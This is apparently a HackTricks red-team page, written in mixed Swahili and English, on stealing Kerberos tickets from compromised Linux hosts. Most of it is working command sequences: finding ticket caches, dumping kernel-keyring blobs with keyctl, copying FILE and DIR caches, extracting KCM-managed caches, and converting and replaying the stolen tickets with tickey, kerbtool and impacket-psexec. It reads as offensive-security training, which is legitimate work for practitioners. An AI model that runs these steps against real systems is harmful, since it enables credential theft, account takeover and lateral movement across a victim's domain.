Harvesting Tickets from Linux

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Credential Storage in Linux

Mifumo ya Linux huhifadhi nyaraka za uthibitisho katika aina tatu za caches, yaani Faili (katika /tmp directory), Kernel Keyrings (sehemu maalum ndani ya kernel ya Linux), na Process Memory (kwa matumizi ya mchakato mmoja). Kigezo cha default_ccache_name katika /etc/krb5.conf kinaonyesha aina ya uhifadhi inayotumika, kinapangwa kuwa FILE:/tmp/krb5cc_%{uid} kama hakikutajwa.

MIT/Heimdal pia zinaunga mkono backends za ziada ambazo unapaswa kutafuta wakati wa post-exploitation:

  • DIR:/run/user/%{uid}/krb5cc kwa directory-backed multi-ticket caches (systemd-logind default kwenye distros za kisasa).
  • KEYRING:persistent:%{uid} au KEYRING:session ili kuweka ccaches ndani ya kernel keyring (KEY_SPEC_SESSION_KEYRING, KEY_SPEC_USER_KEYRING, nk.).
  • KCM:%{uid} wakati SSSD’s Kerberos Cache Manager daemon (kcm) inatoa huduma ya uhifadhi wa tiketi.
  • MEMORY:unique_id kwa caches za mchakato-mwanzo zilizoundwa na maktaba (gssproxy, sshd, nk.).

Kila unapopata shell, choma KRB5CCNAME kutoka /proc/<pid>/environ ya daemons zinazovutia (mf. Apache, sshd, gssproxy) ili ujue ni cache backend gani inatumika kabla hujaanza kunakili faili.

Enumerating Active Caches

Orodhesha caches kabla ya uondoaji ili kuepuka kukosa tiketi zenye thamani kubwa:

$ klist -l            # list caches registered in the local keyring/KCM
$ klist -A            # show all ticket-granting tickets in the current cache
$ sudo keyctl get_persistent @u
$ sudo keyctl show `keyctl get_persistent @u`
$ sudo ls -al /tmp/krb5cc_* /run/user/*/krb5cc*
$ sudo find /proc -maxdepth 2 -name environ -exec sh -c 'tr "\0" "\n" < {} | grep -H KRB5' \;

The combination of klist, keyctl, and /proc inspection quickly reveals whether credentials live in files, keyrings, or KCM so you can pick the right dumping technique.

Kuchukua Vitambulisho

The 2017 paper, Kerberos Credential Thievery (GNU/Linux), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernel’s keyring mechanism for managing and storing keys.

Muhtasari wa Uchimbaji wa Keyring

The keyctl system call, introduced in kernel version 2.6.10, allows user space applications to interact with kernel keyrings. Credentials in keyrings are stored as components (default principal and credentials), distinct from file ccaches which also include a header. The hercules.sh script from the paper demonstrates extracting and reconstructing these components into a usable file ccache for credential theft. Remember that keyring-stored ccaches may live under KEYRING:persistent:%{uid} (permanent across logins), KEYRING:session (cleared on logout), or even KEY_SPEC_THREAD_KEYRING for services spawning helper threads—so always enumerate all keyring types for the compromised UID.

Manual KEYRING Workflow

You can manually harvest tickets without helper scripts whenever default_ccache_name is set to KEYRING::

$ KRING=$(keyctl get_persistent @u)
$ keyctl show $KRING                       # note the key serial of each ccache blob
$ keyctl pipe <serial> > /tmp/ccache_dump  # write raw blob to disk
$ KRB5CCNAME=/tmp/ccache_dump klist        # validate the stolen cache

Ikiwa multiple principals zimehifadhiwa, rudia hatua ya keyctl pipe kwa kila serial, kisha badilisha ccache iliyotolewa kuwa .kirbi/.ccache inayofaa Windows ukitumia zana kama kerbtool (angalia hapa chini) au ticketConverter.py kabla ya kuitumia tena kutoka kwenye mashine nyingine.

Mafanikio ya Haraka ya Kuiba Cache za FILE/DIR

Wakati vitambulisho vinahifadhiwa kama FILE: au DIR: caches, operesheni rahisi za faili kwa kawaida zinatosha:

$ sudo cp /tmp/krb5cc_1000 /tmp/websvc.ccache
$ sudo cp -r /run/user/1000/krb5cc /tmp/user1000_dircc
$ chmod 600 /tmp/*.ccache && chown attacker /tmp/*.ccache

Directory caches contain one file per service ticket, so compress and exfiltrate the whole directory to keep TGT + TGS pairs intact. You can also point your tooling at the directory directly: KRB5CCNAME=DIR:/tmp/user1000_dircc impacket-psexec ....

Dumping KCM-Managed Caches

SSSD’s Kerberos Cache Manager (kcm) proxies credential storage through /var/run/kcm/kcmsock (or /run/.heim_org.h5l.kcm-socket) and persists encrypted blobs inside /var/lib/sss/secrets/ together with .secrets.mkey. Mtiririko wa shambulio:

  1. Tambua matumizi ya KCM kupitia /etc/krb5.conf (default_ccache_name = KCM:) au matokeo ya klist -l.
  2. Ikiwa una UID 0 au ni sehemu ya domain ya kcm ya SELinux, orodhesha caches kupitia management tool:
$ sudo kcm_ctl list                 # lists UID + cache IDs handled by kcm
$ sudo kcm_ctl get 1000 0 > /tmp/1000.kcm.ccache
$ KRB5CCNAME=/tmp/1000.kcm.ccache klist
  1. Offline approach: nakili /var/lib/sss/secrets/secrets.ldb pamoja na /var/lib/sss/secrets/.secrets.mkey, kisha endesha SSSDKCMExtractor (au PoCs zinazofanana) ili kufungua na kurejesha ccaches bila kugusa socket hai. Hii ni hasa muhimu kwa uchunguzi wa forensiki au wakati socket ACLs zinakuzuia lakini ufikiaji wa diski unapatikana.

Kwa kuwa kcm daemon inaheshimu UID-based ACLs zinazotekelezwa na SSSD, kawaida inahitajika escalation ya mamlaka hadi root (au ku-compromise sssd_kcm), lakini mara tu inapo patikana unaweza dump TGT za kila mtumiaji ndani ya sekunde.

Zana za Uchimbaji Tiketi

Kuweka hatua hapo juu kuwa za otomatiki hupunguza makosa na inakupa nyenzo za tiketi zinazofanya kazi kwa majukwaa mbalimbali ambazo unaweza kuchezesha tena kwa kutumia Windows tooling.

Tickey

Building on the principles of the hercules.sh script, the tickey tool is specifically designed for extracting tickets from keyrings, executed via /tmp/tickey -i. It enumerates kernel keyrings, reconstructs the serialized ccaches, and writes MIT-compatible cache files you can immediately feed to klist, impacket-*, or kerberoast tooling.

Kerbtool

kerbtool is a modern Go utility that runs natively on Linux and can parse, convert, and request Kerberos tickets. Two handy use cases when harvesting from Linux boxes:

# Convert a stolen MIT ccache into a .kirbi usable by Windows tooling
$ ./kerbtool --convert --in /tmp/websvc.ccache --out websvc.kirbi

# Use an extracted cache to request additional TGS tickets without touching the victim again
$ KRB5CCNAME=/tmp/websvc.ccache ./kerbtool --ask --spn cifs/fileserver.lab.local

Kuwa na tickey na kerbtool kwenye implant host kunakuwezesha kusonga bila mshono kati ya Linux, Windows, na cross-platform Kerberos attack chains.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks